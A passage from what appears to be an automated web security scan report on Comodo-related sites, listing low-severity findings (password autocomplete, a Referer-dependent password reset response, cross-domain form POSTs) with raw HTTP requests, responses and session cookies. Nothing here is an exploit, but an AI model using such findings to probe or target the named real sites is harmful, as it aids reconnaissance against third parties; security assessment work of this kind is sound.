Path:   /products/vengine/eula.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/eula.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:05 GMT
Content-Type: text/html
Content-Length: 18642
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.58. http://www.vengine.com/products/vengine/faq.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/faq.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:09 GMT
Content-Type: text/html
Content-Length: 14577
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Sit
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.59. http://www.vengine.com/products/vengine/first_time.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/first_time.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/first_time.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:07 GMT
Content-Type: text/html
Content-Length: 10909
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Internet Security
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.60. http://www.vengine.com/products/vengine/help.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/help.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/help.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:04 GMT
Content-Type: text/html
Content-Length: 12152
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Internet Fraudste
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.61. http://www.vengine.com/products/vengine/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/index.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/index.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:37 GMT
Content-Type: text/html
Content-Length: 11866
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Site Authenticati
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.62. http://www.vengine.com/products/vengine/options.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/options.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/options.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:07 GMT
Content-Type: text/html
Content-Length: 11277
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Anti Phishin
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.63. http://www.vengine.com/products/vengine/requirements.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/requirements.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/requirements.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:05 GMT
Content-Type: text/html
Content-Length: 10780
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Installing Verifi
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.64. http://www.vengine.com/products/vengine/setup.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/setup.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/setup.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:06 GMT
Content-Type: text/html
Content-Length: 11624
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Anti Phi
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.65. http://www.vengine.com/products/vengine/ssl_feedback.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/ssl_feedback.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/ssl_feedback.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/vengine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.9.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:42:53 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 11376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>SSL Certificates
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.66. http://www.vengine.com/products/vengine/uninstall.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/uninstall.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/uninstall.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:08 GMT
Content-Type: text/html
Content-Length: 10248
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Download Ant
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.67. http://www.vengine.com/sitemap.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /sitemap.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /sitemap.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:16 GMT
Content-Type: text/html
Content-Length: 11070
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Sitemap - Anti Ph
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.68. http://www.vengine.com/support/faq.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /support/faq.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /support/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:13 GMT
Content-Type: text/html
Content-Length: 15273
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.69. http://www.vengine.com/support/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /support/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /support/index.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/free_tools.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.3.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:23 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 9986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.70. https://www.vengine.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.vengine.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:40 GMT
Content-Type: text/html
Content-Length: 11760
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Anti Phishing Site
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

8. Referer-dependent response

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.instantssl.com
Path:   /products/passwordResetRequest

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.

Request 1

POST /products/passwordResetRequest HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Referer: https://secure.instantssl.com/management/passwordResetRequest.html
Content-Length: 66
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

orderNumber=4543252345324523453245&loginName=&emailAddress=4353245

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:13:20 GMT
Content-Type: text/html; charset=us-ascii
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 449
Cache-Control: max-age=-1

<html>
<head>
<title>Password Reset: ERROR!</title>
<link rel="stylesheet" href="/css/css.css">
</head>
<body>
<b>4543252345324523453245</b> is not a valid Order Number.
<br><br><input type="button" class="input" value="&lt; Back" onClick="window.location = 'https://secure.instantssl.com/management/passwordResetRequest.html'">
&nbsp;&nbsp;<input type="button" class="input" value="Close Window" onClick="window.close()">
</body>
</html>

Request 2

POST /products/passwordResetRequest HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Content-Length: 66
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

orderNumber=4543252345324523453245&loginName=&emailAddress=4353245

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:13:51 GMT
Content-Type: text/html; charset=us-ascii
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 383
Cache-Control: max-age=-1

<html>
<head>
<title>Password Reset: ERROR!</title>
<link rel="stylesheet" href="/css/css.css">
</head>
<body>
<b>4543252345324523453245</b> is not a valid Order Number.
<br><br><input type="button" class="input" value="&lt; Back" onClick="window.location = ''">
&nbsp;&nbsp;<input type="button" class="input" value="Close Window" onClick="window.close()">
</body>
</html>

9. Cross-domain POST
There are 44 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


9.1. http://efaxcorporate.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://efaxcorporate.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:20 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=37657A97FCC62C80A944C9835E8E0575.efaxcorp1b; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:20 GMT
Content-Length: 56030
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div style="width: 700px; margin-top: 90px;">
<form style="width: 700px;" method="POST" id="corporateInquiryForm" name="corporateInquiryForm" action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8">
<input type="hidden" value="corporateInquiryForm" name="formName"/>
...[SNIP]...

9.2. http://efaxdeveloper.com/developer/signup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://efaxdeveloper.com
Path:   /developer/signup

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /developer/signup HTTP/1.1
Host: efaxdeveloper.com
Proxy-Connection: keep-alive
Referer: http://efaxdeveloper.com/?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMS_JSESSIONID=GfhfT1hLPGT9699d9vcWJ3xgrF8M1QQ244SXv36VfyS6KssGwVWX!-244489612; lang=en; AKAINFO=client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3; mbox=check#true#1316366491|session#1316366430838-226146#1316368291|PC#1316366430838-226146.19#1318180833; __utma=1.1246933238.1316366432.1316366432.1316366432.1; __utmb=1.1.10.1316366432; __utmc=1; __utmz=1.1316366432.1.1.utmcsr=j2|utmccn=enterprise%20page|utmcmd=cross%20sell; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:48 GMT
Server: Apache
Cache-Control: max-age=43200, public
Pragma:
Content-Length: 51538
Expires: Mon, 19 Sep 2011 00:19:48 GMT
Last-Modified: Mon, 12 Sep 2011 10:27:24 GMT
X-Magnolia-Registration: Registered
Set-Cookie: lang=en; domain=efaxdeveloper.com; expires=Wednesday, 02-Nov-2011 12:19:48 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-TWA-Web: pb:28032
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<div s
...[SNIP]...
<div class="mboxDefault" style="visibility: visible; display: block;width:338px;margin-left:auto;margin-right:auto;" >


<form action="http://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" name="signup" id="signup" method="POST" onsubmit="return signupValidate();" style="width:100%" >
<div id ="signupformErrorMessage" class="formErrorMessage" style="display:none;">
...[SNIP]...

9.3. http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hackerguardian.com
Path:   /pci-compliance/addsupport/ssl-purchase.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /pci-compliance/addsupport/ssl-purchase.html HTTP/1.1
Host: hackerguardian.com
Proxy-Connection: keep-alive
Referer: http://hackerguardian.com/hackerguardian/buy/pci_free_scan.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316362675388r0.6238376419059932; ap=; referrerURL=http%3A//www.comodo.com/e-commerce/; entryURL=http%3A//hackerguardian.com/hackerguardian/buy/pci_free_scan.html; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; optimizelyBuckets=%7B%7D; __utmb=212060173.1.10.1316362681; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:17:24 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 76758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.opti
...[SNIP]...
</script>


